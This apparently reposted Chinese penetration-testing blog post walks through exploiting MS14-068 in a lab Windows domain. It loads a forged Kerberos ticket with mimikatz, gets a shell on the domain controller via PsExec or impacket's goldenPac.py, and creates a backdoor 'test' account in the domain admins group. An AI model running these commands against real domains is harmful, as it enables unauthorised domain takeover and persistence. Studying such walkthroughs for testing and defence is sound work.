参考:https://blog.csdn.net/qq_37683287/article/details/120450044
域普通用户提权到域控权限
server2008有效 MS14068是一个能够使普通用户提权到域控权限的权限提升漏洞。攻击者可以通过构造特定的请求包来达到提升权限的目的。第一步:利用MS14-068伪造生成TGT
文章图片
第二步:利用mimikatz将工具得到的TGT票据写入内存,创建缓存证书
kerberos::ptc TGT_test@moonsec.fbi.ccache
文章图片
【内网|MS14-068漏洞进行提权】第三步:获取域管理员权限。创建一个 test 账号并加入域管理员组,从而随时可以登录域控主机进行操
作。
PsExec.exe \\dc cmd.exe // 添加test用户
net user test abc123! /add /domain // 把 test 用户添加进域管理员组
net group "domain admins" test /add /domain // 查看域管理员net group "domain admins" /domain
或者使用
python3 goldenPac.py -dc-ip 192.168.0.142 -target-ip 192.168.0.142 moonsec.fbi/test:123456@08server-dc.moonsec.fbi
文章图片
GoldenPac
goldenPac.py 是一个用于对 Kerberos 协议进行测试的工具,它集成在 impacket 工具包里。
Kali 在使用之前需要先安装 Kerberos 客户端
apt-get install krb5-user -y
利用 goldenPac.py 获取 Shell
python3 goldenPac.py 0day.org/jack:Aa123456@OWA2010SP3.0day.org
这里使用 IP 进行连接会连接不成功,只能使用主机名,因此可以在 hosts 文件中添加主机名对应的 IP
goldenPac.py 是通过 PsExec 获得 Shell 的,因此会产生大量的日志,而且现在这种连接方式也已经被各大杀软所拦截。
推荐阅读
- JAVA高并发程序设计|多线程关于无锁的线程是否安全问题
- #|【记】2021年第十二届极客大挑战
- 当人工智能遇上安全|[当人工智能遇上安全] 7.基于机器学习的安全数据集总结
- database|ESQLC数据类型 - string类型
- 安全|GBase 8s ESQLC创建线程安全的应用程序
- 安全|GBase8s ESQL/C 跨线程连接
- javaWeb|HTTPS 的加密流程(你值得拥有)
- 渗透笔记2|WAF绕过-信息收集之反爬虫延时代理池技术
- raid|账号安全基本措施